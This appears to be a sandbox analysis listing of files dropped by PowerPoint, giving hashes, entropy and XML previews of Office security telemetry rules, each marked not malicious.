                                                                                                                              SSDEEP:6:TMVBdcU2zMkQpmOMgwH4JBPW5d2XI7hn2U4dtRMFpAQUHperh7NjxPVCIJA+/Lyr:TMHdK6Xrk2Yl2U4dqAQierrlVZ6NO2su
                                                                                                                              MD5:12ABBECF4A75D08DE65E2B7952B67BA3
                                                                                                                              SHA1:89E007CA78918C9A368E2FEDCBBFDB0CB8B36AEF
                                                                                                                              SHA-256:5001414DC2F4F7540B3F968A810B0DC222D74CDB4D3BA9E650D2B3B87D4C2A0F
                                                                                                                              SHA-512:AB6205310FC5206D3EA083DBD6E6DDF284A142E38E7181D6F54D6E3CF0682EBD9C496A1A16C30FFEA9ADAD3745014035511ECE6DB3F6B636A21FA14D8BEDEE12
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240015" V="1" DC="SM" EN="Office.Security.OTCMacroRegistryBlockEnabled" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a7yta" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):518
                                                                                                                              Entropy (8bit):5.263687858779708
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdLErk2Yl2U4dqAQierP5lVZ6d1x2XtHMNO2su:2dLfl94dSrP5P0X2m
                                                                                                                              MD5:DD68A6A813B8F7C5DDF512ECC1B855EE
                                                                                                                              SHA1:7A303105BBA802198B483408BFE02E3922C52024
                                                                                                                              SHA-256:EF7A8A3526A647498166B47F8AB6808454BA9CAD516EE65A5F241B20D71CA5BB
                                                                                                                              SHA-512:896E9B9F5085DEBF8453FBFDE7F44345BEC05EEE1252332FD8C63B974F2948A5B1A760DE697CEC00E15686361A6FE6417B2886360D39295468650BD841E4E51B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240016" V="0" DC="SM" EN="Office.Security.CryptoMissingAlgorithm" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="baqjt" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="W" I="1" O="false" N="EncryptionAlgorithm">.. <S T="1" F="Crypto Algorithm" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):637
                                                                                                                              Entropy (8bit):5.158077005948144
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdG9V+k2Yl2U4dqAQierJ3NlVZ6Z/BZdLIdy9I0b/Ic0+INO2su:2d6Tl94dSrJ9P83dIZ0b0+g
                                                                                                                              MD5:6E1E89B5C8C5AFE4EEB5ECBB763639AD
                                                                                                                              SHA1:3F63ADB301594F4F6C75A2040AC6086B87BADCF4
                                                                                                                              SHA-256:413D4E21DF9AEAB7FE67400444980DB74544C1DD1EC342C81834AF3C8CD58624
                                                                                                                              SHA-512:2068250EA71D633C5E5E93CA86C8AEAC085E0A61F362C6B08C012833F9E4F3387EFB8AD75CB8C8463473F6992C4424F15F74B84A6D72B646D9B9DCB0B87351B7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240018" V="0" DC="SM" EN="Office.Security.InternetFileBypassPV" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bcjno" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U64" I="1" O="true" N="DocumentPointer">.. <S T="1" F="pioldoc" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="InternetFileSafetyDetail">.. <S T="1" F="InternetFileSafetyDetail" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):607
                                                                                                                              Entropy (8bit):5.117041119471356
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdE4Qk2Yl2U4dqAQierE76JOvkdofwtBsfIiJENO2su:2dEkl94dSrE7gQo
                                                                                                                              MD5:90FAC10ED9B225CEC6F4D4D9F2EF6CDC
                                                                                                                              SHA1:42CEB0CE15A6763421298EF42CA5CFCE09BD8892
                                                                                                                              SHA-256:3A151A1D003D266F11D392ECB7E565A1801F0AB7B7E82D38DA772CB8E7F72B9B
                                                                                                                              SHA-512:D46FA8C386D22C24B51E2DB2C5EBBB4DCEADC002844B7756498CDD1ED85D4EDB7A0C49B0337A704B8E879F251CB3E189F0EBE3012A3C4AA32DC00BC597F496C5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240020" V="0" DC="SM" EN="Office.Security.MsoLoadMsipc" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bdn4k" />.. </S>.. <C T="W" I="0" O="false" N="ProductId">.. <S T="1" F="ProductId" M="Ignore" />.. </C>.. <C T="W" I="1" O="false" N="ComponentId">.. <S T="1" F="ComponentId" M="Ignore" />.. </C>.. <C T="I32" I="2" O="false" N="InstallState">.. <S T="1" F="InstallState" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):611
                                                                                                                              Entropy (8bit):5.168393642237472
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdFvoo9rk2Yl2U4dqAQierNPsQuUIRLIiUwt2XM9tNO2su:2dFwo9kl94dSrNP/IRSKx
                                                                                                                              MD5:F83740C89920E12621C47DC6A9D1EE2F
                                                                                                                              SHA1:794DAE8A8B8F64A3A3183893A883DD882B8D1249
                                                                                                                              SHA-256:0CB6480C04FD5C911FD78806CEDA7783B4A9F335B695BE7CF2B6CA381D2D9E7C
                                                                                                                              SHA-512:5E4248EAD8D5288AB185124FDE5F8493395951104C2C85ABE51D3B75781FED20699CF6160D4E062FD8809B135BEF4709ECCE34E315496E16E4A1BEE1343B10F6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240021" V="1" DC="SM" EN="Office.Security.HyperlinkActivation" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bdo4a" />.. </S>.. <C T="W" I="0" O="true" N="UrlScheme">.. <S T="1" F="UrlScheme" M="Ignore" />.. </C>.. <C T="U32" I="1" O="false" N="UrlZone">.. <S T="1" F="UrlZone" M="Ignore" />.. </C>.. <C T="I32" I="2" O="false" N="MapUrlToZoneHr">.. <S T="1" F="MapUrlToZoneHr" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1305
                                                                                                                              Entropy (8bit):4.9621845209574555
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdRalrk2Yl2U4dierlsPB/L8N/IiXnpdl3m9IibfN1Df8NNE35n3YgQ9xJ5NNX:2dTl94dVrwB8Rg7F1IahdSvmb0b
                                                                                                                              MD5:BE3958ED220964F2F66920BA912EA761
                                                                                                                              SHA1:8BA4918FA4EB6CBA4F54B49C2CD1EB94AE280618
                                                                                                                              SHA-256:9929CF91C1F5573263CAC2F79C38F07C0A9F842134328B49E70CABB7B6A3750C
                                                                                                                              SHA-512:04D59B13E26C8C01ADC08C9DB7D24BE8725CEB3D7FD9CFC8EAB78DE0CFD245D65E5042A7E9562A09F74C898F946CCFCA64C02DA3056EBD53381F0002691FE675
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240025" V="1" DC="SM" EN="Office.Security.DlpDesktopClassificationCount" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bgqq0" />.. </S>.. <C T="U32" I="0" O="false" N="CategoriesOnOpen">.. <S T="1" F="CategoriesOnOpen" />.. </C>.. <C T="U32" I="1" O="false" N="InstancesOnOpen">.. <S T="1" F="InstancesOnOpen" />.. </C>.. <C T="U32" I="2" O="false" N="CategoriesOnClose">.. <S T="1" F="CategoriesOnClose" />.. </C>.. <C T="U32" I="3" O="false" N="InstancesOnClose">.. <S T="1" F="InstancesOnClose" />.. </C>.. <C T="U32" I="4" O="false" N="EvaluationRuns">.. <S T="1" F="EvaluationRuns" />.. </C>.. <C T="B" I="5" O="false" N="DidOverride">.. <S T="1" F="DidOverride" />.. </C>.. <C T="U32" I="6" O="false" N="ServerRuleIds">.. <S T="1" F="ServerRuleIds" M="Ignore" />.. </C>.. <C T="U32" I="7" O="false" N="ClientRuleIds">.. <S T=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6692
                                                                                                                              Entropy (8bit):4.267690316369607
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:4WaiJqpeUKwhMHPytYPz9qjixvqFXHanb4nd:43iJ3mzRHanb4nd
                                                                                                                              MD5:7733594F341EE4AAD941DE905705F392
                                                                                                                              SHA1:35DAB53EFD9243B7D641AA676071A21A81C0A185
                                                                                                                              SHA-256:B7919AB25D08A36D7A19AFB711FBDD8D55D09F24C3C5314FBC11099CCAC0B258
                                                                                                                              SHA-512:670679AFD93DA840A5D6B5445BE9CDFF4EA7AE7C87017966355C34E11C6BD9B70D47028EB7E4F6EB374DFACC797ADE01A1545706980EC868359A66E76F8070A7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240026" V="0" DC="SM" EN="Office.Security.CryptoFileOpenDetails" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a3v6n" />.. <UTS T="2" Id="bmn4l" />.. <UTS T="3" Id="bggkq" />.. <UTS T="4" Id="bmn4k" />.. <UTS T="5" Id="a23iu" />.. <UTS T="6" Id="blu8c" />.. <UTS T="7" Id="bgi47" />.. <UTS T="8" Id="blu8d" />.. <UTS T="9" Id="a3v6q" />.. <UTS T="10" Id="blr4c" />.. <UTS T="11" Id="bgi3u" />.. <UTS T="12" Id="blr4b" />.. <US T="13">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. <S T="4" />.. <S T="5" />.. <S T="6" />.. <S T="7" />.. <S T="8" />.. <S T="9" />.. <S T="10" />.. <S T="11" />.. <S T="12" />.. </US>.. <UTS T="14" Id="a3v6o" />.. <UTS T="15" Id="bggkr" />.. <UTS T="16" Id="bauqz" />.. <UTS T="17" Id="bgi48" />.. <
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):511
                                                                                                                              Entropy (8bit):5.129653497869513
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd6J0pk2Yl2U4dqAQiersfer1OSNah6O/K0NOcsu:2dEl94dSrsWrfHOi+
                                                                                                                              MD5:9E760D60C003411D626E25DCFE71EF8E
                                                                                                                              SHA1:B4E9D635FEB9F6CFB1A2859C60E70A4478F6F1D5
                                                                                                                              SHA-256:3676FE3A10C8DBD2F49047C964D8BE782F2CAAB9A33F1836672B801FD7E77143
                                                                                                                              SHA-512:93B399C931588D8859F534C27D9785F5711203AE7BB4CE8E83E3F37977BCAEAB7BC1A2273A1A56E9FE4CD5B25AC65237885AC37DA91A5F98B45E45436F8F15EA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240029" V="0" DC="SM" EN="Office.Security.TrustCenterMotWBlock" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhfmy" />.. <UTS T="2" Id="bhfmz" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="W" I="0" O="false" N="AddinExtension">.. <S T="3" F="AddinExtension" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):612
                                                                                                                              Entropy (8bit):5.147125217335964
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdn/5k2Yl2U4dqAQierEkRqqOzynSCXPuGXPlMp13Duz3DSNO2su:2dn/Sl94dSrEteBNu+u
                                                                                                                              MD5:24A635509F8CC1599F64692601E074C8
                                                                                                                              SHA1:D4F6EBC1A83555A467E6869BFA99E7A7D0449E8A
                                                                                                                              SHA-256:F4A16FE427D3E8EE1D6FD95653BE5C30E0F1D2DF27A96CE0D785A643443AE0E3
                                                                                                                              SHA-512:4CF752D828C1F38D1E8AD67144B420A0D5B0937549DE1728613EC83436E8935DDDAFE652F921B4F4B00B7C6B0446EC3C0671E25E65EB981E7741417DF96E62D7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240030" V="0" DC="SM" EN="Office.Security.TCOcxUFIPrompt" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhi92" />.. </S>.. <C T="B" I="0" O="false" N="FromInternet">.. <S T="1" F="FromInternet" />.. </C>.. <C T="B" I="1" O="false" N="SecureReaderMode">.. <S T="1" F="SecureReaderMode" />.. </C>.. <C T="U32" I="2" O="false" N="OcxTrustCenterSettings">.. <S T="1" F="OcxTrustCenterSettings" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):508
                                                                                                                              Entropy (8bit):5.209510880922825
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdneJEMPCZk2Yl2U4dqAQieru1RqqOzynSCXPuGXPlMNO2su:2dn9Byl94dSrukeBNk
                                                                                                                              MD5:97335EE08DE92CE0DF7F34641B8EE20F
                                                                                                                              SHA1:3859CBB7F3196940F367D861DD86F845A11E0F8C
                                                                                                                              SHA-256:6F8599C5E10EE7526AF60E1B4E6CEF9312C3673B1872E9C4E8C437DF0DC9DAFC
                                                                                                                              SHA-512:F4EF19A472E3635E76F4EDC168505D4BE65A8F54E83150D6398807FCE9A37BDA83E671C749B357D8F0C31674A3A820B5B9CE8C233F2E180B701D09079432DB3C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240031" V="0" DC="SM" EN="Office.Security.TCOcxUFIClickThrough" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhi91" />.. </S>.. <C T="B" I="0" O="false" N="FromInternet">.. <S T="1" F="FromInternet" />.. </C>.. <C T="B" I="1" O="false" N="SecureReaderMode">.. <S T="1" F="SecureReaderMode" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):857
                                                                                                                              Entropy (8bit):5.034294155560994
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdnvjJk2Yl2U4dqAQieri/KyneqqOzyntkypFIVyp3vcynHDJCXPuGXPlM23Dz:2dnvjCl94dSriCGWp5p0AOBNH+u
                                                                                                                              MD5:E6F5F1451DE2D2ED09416075C09F173F
                                                                                                                              SHA1:59D2D1172AF4069B0B8173211060C61CB8DD4974
                                                                                                                              SHA-256:DC778837CE7ADDDBC08C42266374347B6D9031919A49FFA4D67FB19AEB7C0115
                                                                                                                              SHA-512:304DCF527BD7C345BCC7B1B675619F6C1ECA470F0C66C30C819D83522096F1CAA6B454B0BF2F1B3E68BC4874C8FA9B6CE0C2CDC871147C947E43D91B6601B8D9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240032" V="0" DC="SM" EN="Office.Security.TCOcxTrustedEncounter" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhi94" />.. </S>.. <C T="U64" I="0" O="false" N="DocID">.. <S T="1" F="DocID" />.. </C>.. <C T="B" I="1" O="false" N="FromInternet">.. <S T="1" F="FromInternet" />.. </C>.. <C T="B" I="2" O="false" N="IsEmbeddable">.. <S T="1" F="IsEmbeddable" />.. </C>.. <C T="G" I="3" O="false" N="Clsid">.. <S T="1" F="CLSID" />.. </C>.. <C T="B" I="4" O="false" N="SecureReaderMode">.. <S T="1" F="SecureReaderMode" />.. </C>.. <C T="U32" I="5" O="false" N="OcxTrustCenterSettings">.. <S T="1" F="OcxTrustCenterSettings" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1032
                                                                                                                              Entropy (8bit):4.986787084387682
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dnglPWtCl94dSr2GWp5pwtKaaBNCF1k+u:cUWSWSLWzxMU+u
                                                                                                                              MD5:64131342FC87A55C07D0E109080DC852
                                                                                                                              SHA1:4388DA3815B7F01294DEA017B607C7C76AC3B93E
                                                                                                                              SHA-256:AA2474C085BE7AEE4F0C57DCCF07F91A06AD20E994F0248D405998AC976FF915
                                                                                                                              SHA-512:0DCBCE1A79A50499FA611BB4055AE7CBC161E14F10E0002FC73B20165008B20DDCDD289F26F4DC518E14CA83A8F81C1F40BABF155463BAB6411E21C504024F80
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240033" V="0" DC="SM" EN="Office.Security.TCOcxNonTrustedEncounter" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhi93" />.. </S>.. <C T="U64" I="0" O="false" N="DocID">.. <S T="1" F="DocID" />.. </C>.. <C T="B" I="1" O="false" N="FromInternet">.. <S T="1" F="FromInternet" />.. </C>.. <C T="B" I="2" O="false" N="IsEmbeddable">.. <S T="1" F="IsEmbeddable" />.. </C>.. <C T="B" I="3" O="false" N="SafeForInit">.. <S T="1" F="SafeForInit" />.. </C>.. <C T="G" I="4" O="false" N="Clsid">.. <S T="1" F="CLSID" />.. </C>.. <C T="B" I="5" O="false" N="SecureReaderMode">.. <S T="1" F="SecureReaderMode" />.. </C>.. <C T="U32" I="6" O="false" N="Permission">.. <S T="1" F="Permission" />.. </C>.. <C T="U32" I="7" O="false" N="OcxTrustCenterSettings">.. <S T="1" F="OcxTrustCenterSettings" />.. </C>.. <T>.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):394
                                                                                                                              Entropy (8bit):5.240886248173541
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdnSWF0xmak2Yl2U4dierHIHJ9NO2su:2dnm6l94dVrgz
                                                                                                                              MD5:A48C0EB35FCEE2BECA55CA6C5D04A7A8
                                                                                                                              SHA1:EF40F1AECD3E7510264488DFC85E0F6FC5F04B1C
                                                                                                                              SHA-256:43F4646D0A156E86F2F1FBC442039E399CA786F93B92CA369033A06F16BC2927
                                                                                                                              SHA-512:5C6A2C238E49585ADF0D2A906B636D7B4781E2A03AEF19A08F74358240DF720A4A2E1071191505909B8C44183F39125DEBFC90D369C75027211678056314AF48
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240034" V="0" DC="SM" EN="Office.Security.RestrictedOwnerRightsTemplateUsage" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bho7n" />.. </S>.. <C T="I32" I="0" O="false" N="UserResponse">.. <S T="1" F="Result" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):754
                                                                                                                              Entropy (8bit):5.075970820784445
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdnyOQk2Yl2U4dqAQierDGJUICYneqqOzyntFI2fjykNAygd+xU/E4NO2su:2dnbrl94dSrcErIT+OcQ
                                                                                                                              MD5:CEAD67DA0731D54621842D714E758529
                                                                                                                              SHA1:C7DC7F1E4F161F4D438963678779810491D72554
                                                                                                                              SHA-256:29A33FB5694BBAF7E5DF472904198C14101D8CD3AFAE6189D5A709715C820214
                                                                                                                              SHA-512:1D099D7B7C71BDC43166179D24D3A74F8EF295F736BBEE02B20C9A84A9F8B35E0596E59E38904193A73A0CCFC75E39C0DAF0985FF807BEC710519616370DAE3C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240038" V="0" DC="SM" EN="Office.Security.TWCPackagerData" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bmzuw" />.. </S>.. <C T="B" I="0" O="false" N="IsBlocked">.. <S T="1" F="IsBlocked" />.. </C>.. <C T="B" I="1" O="false" N="FromInternet">.. <S T="1" F="FromInternet" />.. </C>.. <C T="B" I="2" O="false" N="IsTrustedDoc">.. <S T="1" F="IsTrustedDoc" />.. </C>.. <C T="U32" I="3" O="false" N="PackagerSetting">.. <S T="1" F="PackagerSetting" />.. </C>.. <C T="W" I="4" O="true" N="Extension">.. <S T="1" F="Extension" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):665
                                                                                                                              Entropy (8bit):5.100744436625914
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdn2FKkak2Yl2U4dqAQierDFRqqOzynaI2fp+ykNAygdVmbSEmyNO2su:2dnEl94dSrwDMITYvmi
                                                                                                                              MD5:37EC689C64BAB22111C9BB055DEB2B9E
                                                                                                                              SHA1:450B7CBDDE8A3866F8550CE5489AE498C987B325
                                                                                                                              SHA-256:FECB0A4F68A76EE843A852456E1D926E06724125B09DE2589E67F19CE2EBCCB4
                                                                                                                              SHA-512:357A960543F40A03E4E7A67860CC7C6647B8E4C1D08FC746EBB36FA330DE586D53E34A1AB6D093926449F8E4D0353BBF292E2779F72AAA6A71815178782B7D52
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240039" V="0" DC="SM" EN="Office.Security.TWCPackagerError" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bmzuv" />.. </S>.. <C T="B" I="0" O="false" N="FromInternet">.. <S T="1" F="FromInternet" />.. </C>.. <C T="B" I="1" O="false" N="IsTrustedDoc">.. <S T="1" F="IsTrustedDoc" />.. </C>.. <C T="U32" I="2" O="false" N="PackagerSetting">.. <S T="1" F="PackagerSetting" />.. </C>.. <C T="W" I="3" O="true" N="Error">.. <S T="1" F="Error" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4112
                                                                                                                              Entropy (8bit):3.330772075499042
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dTuXRFXzRFUmDqRF4zRFnVxRFnkzRFNngqRFlzRFG/f0PcpsJpDYpZ11uMTX0oG:cTuXRpRqm2RaRpRiRrzRjRQMf
                                                                                                                              MD5:A8EA838E73635A5DC117EFAC63AF3953
                                                                                                                              SHA1:CB873A4F9971E8BAA82A79AF6522CE0189F22719
                                                                                                                              SHA-256:675C34794F14A82D66C8E1A2847414F01FDBB0A8F634CF3AE490186B8417E752
                                                                                                                              SHA-512:57CD2E4E07098E8C04A981EFF3B6CA7CE2CC5F49D869899839F54D93D3F2405509027AFB2A6C8A99B1180E7700B89105F992BBBFB6D211DE1852E6FD68178F73
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="241000" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <UCSS T="1" C="Scope Summary" S="Medium" />.. <F T="2">.. <O T="OR">.. <L>.. <O T="OR">.. <L>.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Tag" />.. </L>.. <R>.. <V V="7690251" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Tag" />.. </L>.. <R>.. <V V="8245790" T="U32" />.. </R>.. </O>.. </R>.. </O>.. </L>.. <R>.. <O T="OR">.. <L>.. <O T="EQ">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1972
                                                                                                                              Entropy (8bit):4.705321959343666
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dwdwQc11mMl94dk30chKouyPjRF4qLPD3RfT0cV0sOczioc8cg:cwiQI1jWW0qFuybRF4q90w0q59j
                                                                                                                              MD5:4FB87B822119E9FCDD9D0F40CEF4DBBA
                                                                                                                              SHA1:E05DA6BD78E217A37AA44973DF3CA35B39986E25
                                                                                                                              SHA-256:36A1EC63E4BEDA579B4099452622D92DC9E492375995421238F600C9540704AC
                                                                                                                              SHA-512:D2DE0BAAFEBE42080E1F8D95B782FA37BBFD21600DB1C37F4ACB7F4EE5070D7242AB853779577EFAAA721BE6B0CE5690F0C5F3AEE818D1EAD6F1B87C9F6A8993
                                                                                                                              Malicious:false
